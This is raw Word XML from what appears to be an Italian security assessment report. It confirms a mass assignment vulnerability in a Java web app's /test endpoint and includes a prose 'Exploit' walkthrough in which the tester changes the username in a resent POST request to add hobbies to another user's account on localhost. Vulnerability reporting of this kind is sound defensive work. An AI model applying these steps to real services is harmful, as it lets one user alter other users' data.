          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251936768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10C8ACF2" wp14:editId="35FD2B7A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-473075</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4236720" cy="4236720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="443722213"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04FA7F57" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35C9CAAC" w14:textId="108E6979"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213099F4" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="753F7BF5" w14:textId="684AADB3" w:rsidR="005E267F" w:rsidRDefault="007A6099"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13F6A530">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>112395</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4792980" cy="635"/>
                <wp:effectExtent l="0" t="0" r="762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6012373A"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>4</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29" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:8.85pt;width:377.4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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0EA556AD" w14:textId="6012373A"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>4</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HobbyServiceImpl.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D17A679" w14:textId="29E85649" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20110ADE" w14:textId="265DCB19" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A67F4F9" w14:textId="7A6A412B"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48D3747A" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D6730C" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B344B6E" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE45FD8" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="195582A9" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F028811" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F8319D" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7037D5F7" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="278BDA82" w14:textId="77777777" w:rsidR="007A6099" w:rsidRDefault="007A6099" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DF822C7" w14:textId="05F3089F" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00E24530"/>
    <w:p w14:paraId="3F729578" w14:textId="6F16F701" w:rsidR="00241973" w:rsidRPr="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Veri Positivi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225425EA" w14:textId="77777777" w:rsidR="00241973" w:rsidRPr="007019BC" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007019BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mass assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113F54CF" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TestController</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56823">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A531A9" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t>: 26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6EFD87" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56011BC7" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">È una vulnerabilità che nasce dalla mancanza di controllo dei campi modificabili di un oggetto, permettendo agli utenti di modificare o accedere dati che normalmente non dovrebbero essere modificabili e/o accessibili. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03938554" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D6E876F" w14:textId="65100ECB" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In questo caso, l’oggetto Test contiene il campo username superfluo, il quale può essere modificato, facendo in modo di apportare modifiche agli hobby di altri utenti se l’utente corrente è a conoscenza degli altri username salvati. In questo caso quindi l’exploit è più difficile da fare ma comunque fattibile. La vittima quindi si troverebbe degli hobby non inseriti da lui e, di conseguenza, le offerte a lui proposte non sarebbero congrue agli interessi da lui espressi. In </w:t>
      </w:r>
      <w:r w:rsidR="003836B9">
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">igura </w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> è mostrata la funzione saveTestResults() in TestServiceImpl.java richiamata nell’API /test in TestController.java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244E95B4" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75D1CED6" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>La vulnerabilità risulta vera poiché non c’è nessun controllo sull’utente che sta inserendo gli hobby, ossia l’username inserito nella POST inviata può essere diverso dall’utente autenticato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF8EDA4" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44C176D5" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251919360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="028F9900" wp14:editId="59ED3A03">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-358140</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>187960</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6973570" cy="1195705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:wrapNone/>
            <wp:docPr id="13823756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7CD77AF3" wp14:editId="7194C8C4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-430530</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1387475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6973570" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="128367081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7E5C87F0" w14:textId="463780CD"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5</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7AF3" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-33.9pt;margin-top:109.25pt;width:549.1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0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XR7fXNL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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7E5C87F0" w14:textId="463780CD"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5</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: TestController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF8A371" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79A30CA0" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F284983" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47991C4D" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57DF9D99" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38ADD870" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00552313" w14:textId="024FB9BD" w:rsidR="00241973" w:rsidRDefault="00743C4B" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251937792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A32600E" wp14:editId="45A480A0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>143598</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6453769" cy="2134870"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="21580987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769" cy="2134870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2F2FF8" w14:textId="45199AAD" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76503367" w14:textId="32B67E26" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251923456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="73E6F738" wp14:editId="7EA70E75">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-29845</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1912620</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5928995" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1821558240"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0FA3B68" w14:textId="4E52CD73"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6</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:r w:rsidR="003836B9">
                              <w:t>Test</w:t>
                            </w:r>
                            <w:r>
                              <w:t>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738" id="_x0000_s1031" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-2.35pt;margin-top:150.6pt;width:466.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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="00FA3B68" w14:textId="4E52CD73"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6</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:r w:rsidR="003836B9">
                        <w:t>Test</w:t>
                      </w:r>
                      <w:r>
                        <w:t>ServiceImpl.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD0FDBC" w14:textId="019FE64A" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55A3174C" w14:textId="19581E69" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC19E24" w14:textId="025F619D" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ADCBB9E" w14:textId="1BA90DB0" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61169601" w14:textId="12BC1B23" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A859D00" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32E4CD69" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA908C5" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B2565B1" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00743C4B"/>
    <w:p w14:paraId="74BB1ACE" w14:textId="77777777" w:rsidR="00241973" w:rsidRPr="00ED7083" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED7083">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49004A12" w14:textId="193C5A4A" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Innanzitutto, bisogna essere autenticati con un utente valido. Successivamente ci si collega al seguente URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00FC6739">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>http://localhost:8080/test</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Collegamentoipertestuale"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Collegamentoipertestuale"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, si apre il web developer tool del browser nella sezione network per accedere alle richieste inviate sulla rete. Bisogna poi inserire un hobby normalmente come in Figura </w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:rPr>
          <w:rStyle w:val="Collegamentoipertestuale"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Collegamentoipertestuale"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, in modo da andare a modificare la richiesta facendo Edit and Resend e cambiando lo username con quello della vittima, come visibile in Figura </w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:rPr>
          <w:rStyle w:val="Collegamentoipertestuale"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Collegamentoipertestuale"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">In questo modo siamo riusciti a inserire l’hobby per l’utente “salvatore” ma essendo autenticati come “user”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B266A7C" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BCFD7A2" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251925504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6ECC14DD" wp14:editId="26494DF6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-285750</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4117340</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6691630" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1784695287"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C2C8551" w14:textId="12774E96"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7</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14DD" id="_x0000_s1032" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-22.5pt;margin-top:324.2pt;width:526.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A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efZ/JZcknzz24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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2C2C8551" w14:textId="12774E96"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7</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Inserimento di un nuovo hobby</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251924480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65408A97" wp14:editId="7811B3D8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>146050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6691917" cy="3914666"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7198646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6F9051B8" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E9BE107" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D1493A7" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6971136E" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="320351C8" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="446531EF" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79397437" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C2C4C61" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A7AFC61" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B30F899" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40BDB383" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="489C8FB1" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="394150BE" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
